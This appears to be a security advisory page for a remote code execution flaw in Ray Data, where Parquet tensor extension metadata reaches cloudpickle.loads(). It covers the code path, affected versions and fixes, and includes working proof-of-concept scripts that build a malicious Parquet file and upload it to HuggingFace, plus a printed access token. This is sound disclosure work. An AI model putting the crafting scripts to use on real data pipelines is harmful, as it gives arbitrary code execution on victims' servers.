Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
Description (GitHub Advisory)
Remote Code Execution via Parquet Arrow Extension Type Deserialization
Summary
Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.
In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.
Details
Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
The code path to cloudpickle.loads()
All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )
The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.
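The ordering problem can be shown with a small, harmless sketch. It assumes the standard-library pickle module as a stand-in for cloudpickle (both honor __reduce__ when loading), and the names Marker and deserialize_with_fallback are illustrative, not Ray's code. The payload here asks the unpickler to call tuple(); a crafted file could name any other callable instead.

```python
import json
import pickle


class Marker:
    """Illustrative payload: tells the unpickler which callable to invoke."""

    def __reduce__(self):
        # Harmless here (builds a tuple); a crafted file could name any callable.
        return (tuple, ([3, 224, 224],))


def deserialize_with_fallback(serialized: bytes):
    """Same ordering as the function above: pickle first, JSON second."""
    try:
        return pickle.loads(serialized)
    except Exception:
        return json.loads(serialized)


# The callable chosen by the payload runs inside loads(); no Marker comes back.
from_pickle = deserialize_with_fallback(pickle.dumps(Marker()))

# Legitimate JSON metadata only reaches json.loads() after pickle rejects it.
from_json = deserialize_with_fallback(b"[3, 224, 224]")

print(type(from_pickle).__name__, from_pickle)
print(type(from_json).__name__, from_json)
```

The first call returns whatever the payload's callable produced, which is why the JSON branch offers no protection: it is only consulted after the unpickler has already run.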
For ArrowTensorType, the call chain is:
__arrow_ext_deserialize__(cls, storage_type, serialized)        # arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)       # arrow.py:178
    -> _arrow_ext_deserialize_compute(serialized, value_type)   # arrow.py:652
      -> _deserialize_with_fallback(serialized, "shape")        # arrow.py:653
        -> cloudpickle.loads(serialized)                        # arrow.py:88 RCE
ArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.
Why the existing mitigation doesn't help
After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.
    Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
    the extension type extended `PyExtensionType`. However, this base type can expose
    users to arbitrary code execution. To prevent this, we don't load the type by
    default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)
This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.
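Since any effective guard has to run before PyArrow resolves the extension types, one possible approach is to screen raw field metadata in a process that never imports ray.data. The sketch below operates on a plain mapping of bytes keys to bytes values (the shape that pyarrow.Field.metadata exposes). The helper name is_suspicious, the set of type names copied from this advisory, and the policy of accepting only JSON metadata are all assumptions made for illustration; none of this is part of Ray.

```python
import json

# Extension type names listed in this advisory.
RAY_TENSOR_TYPES = {
    b"ray.data.arrow_tensor",
    b"ray.data.arrow_tensor_v2",
    b"ray.data.arrow_variable_shaped_tensor",
}


def is_suspicious(field_metadata):
    """Return True if a Ray tensor field carries metadata that is not plain JSON.

    `field_metadata` is a dict of bytes -> bytes, or None when a field has no
    metadata. Hypothetical pre-screening helper; it never unpickles anything.
    """
    if not field_metadata:
        return False
    if field_metadata.get(b"ARROW:extension:name") not in RAY_TENSOR_TYPES:
        return False
    raw = field_metadata.get(b"ARROW:extension:metadata", b"")
    try:
        json.loads(raw)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return True
    return False
```

Note that files written legitimately by the affected Ray versions also use the cloudpickle format, so a screen like this flags them as well. It cannot tell a benign pickle from a malicious one; it only identifies files that would reach cloudpickle.loads().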
Outside Ray's documented threat model
Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.
Impact
- Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable _deserialize_with_fallback function with cloudpickle.loads() was introduced in commit f6d21db1a4 (PR #54831, July 2025), first released in Ray 2.49.0.
- Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including ray.data.read_parquet(), pyarrow.parquet.read_table(), pandas.read_parquet(), etc.
- Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a ray.data.arrow_tensor (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
- CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- Severity: Critical
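A quick way to check an environment against the affected range is sketched below. It reads the installed version through importlib.metadata rather than importing ray, so the check itself does not register the extension types. The bounds are taken from this advisory and may change once a fixed release ships; the function names are illustrative. Development builds of master fall outside the numeric range even though the advisory reports master as vulnerable, so treat a negative result with care.

```python
import re
from importlib import metadata

# Range stated in this advisory; the upper bound may change once a fix ships.
FIRST_AFFECTED = (2, 49, 0)
LAST_AFFECTED = (2, 54, 0)


def parse_release(version: str):
    """Extract the leading major.minor.patch numbers, ignoring suffixes like rc1."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"Unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_affected(version: str) -> bool:
    """True when the release numbers fall inside the advisory's range."""
    return FIRST_AFFECTED <= parse_release(version) <= LAST_AFFECTED


def installed_ray_version():
    """Look up the installed version without importing ray itself."""
    try:
        return metadata.version("ray")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_ray_version()
    if found is None:
        print("ray is not installed in this environment")
    else:
        print(f"ray {found}: affected={is_affected(found)}")
```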
Attack scenarios
- HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with ray.data.arrow_tensor metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
- Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
- Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.
PoC
We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.
Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).
PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.
1. Create the Parquet file:
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq
COMMAND = "id > /tmp/ray-tensor-rce-proof"
class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
2. Read it with Ray Data:
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution
PoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.
We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.
Upload script (for reference, this is how we seeded the dataset):
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.
Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi
def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))
    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))
repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id, repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
Reproduce (reads the dataset from HuggingFace, no local files needed):
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace dataset
The token above is read-only. The dataset is private to prevent unintended exposure.
Suggested fix
The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.
- Replace cloudpickle.loads() in _deserialize_with_fallback() with json.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate cloudpickle.loads() behind an opt-in environment variable (following the pattern already established with RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE).
- Serialize new extension type metadata as JSON by default. json.dumps([3, 224, 224]) carries the same information as cloudpickle.dumps((3, 224, 224)), without the code execution risk.
- Add a security note to read_parquet() documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.
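The first two suggestions could look roughly like the sketch below. It is not Ray's implementation: the environment variable name is hypothetical, the standard-library pickle module stands in for cloudpickle, and only the shape case is covered (an ndim integer would need an analogous check). The result is validated after parsing so that unexpected JSON values are rejected too.

```python
import json
import os
import pickle

# Hypothetical opt-in switch; the name is illustrative, not a real Ray setting.
LEGACY_PICKLE_ENV = "EXAMPLE_ALLOW_PICKLED_TENSOR_METADATA"


def _is_dim(value):
    # bool is a subclass of int, so exclude it explicitly.
    return isinstance(value, int) and not isinstance(value, bool)


def serialize_shape(shape) -> bytes:
    """Write the shape as a JSON array of integers."""
    return json.dumps(list(shape)).encode("utf-8")


def deserialize_shape(serialized: bytes):
    """Parse JSON first; unpickle only when the operator has opted in."""
    try:
        value = json.loads(serialized)
    except ValueError:  # JSONDecodeError or UnicodeDecodeError
        if os.environ.get(LEGACY_PICKLE_ENV) != "1":
            raise ValueError("Tensor metadata is not valid JSON") from None
        # Stand-in for cloudpickle.loads(); still unsafe for untrusted files.
        value = pickle.loads(serialized)
    if not isinstance(value, (list, tuple)) or not all(_is_dim(d) for d in value):
        raise ValueError("Tensor shape must be a sequence of integers")
    return tuple(value)
```

With the switch unset, a pickled payload is rejected before any unpickling happens. Setting it restores the legacy behavior and the associated risk, so it would only be appropriate for files from a trusted source.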
Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.
Analysis (AI)
Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
| --- | --- |
| Exploitation | Victim must use Ray Data versions 2.49.0-2.54.0 AND read a Parquet file from an attacker-controlled or attacker-influenced source. … |
| Risk Assessment | This vulnerability presents critical real-world risk despite absence of CVSS vector and EPSS score. … |
| Exploit Scenario | An attacker creates a HuggingFace dataset containing a seemingly legitimate ML training dataset with tensor, id, and text columns saved as Parquet. The tensor column uses Ray's arrow_tensor extension type with a malicious cloudpickle payload in the extension metadata field. … |
| Remediation | Upgrade to Ray version 2.55.0 or later once available. Vendor advisory GHSA-mw35-8rx3-xf9r confirms a patch is in development, but a released patched version was not independently confirmed at time of analysis. … |
Recommended Action (AI)
Within 24 hours: Identify all systems running Ray Data 2.49.0-2.54.0 using pip show ray and inventory which versions are in production or development. …
EUVD-2026-28828
GHSA-mw35-8rx3-xf9r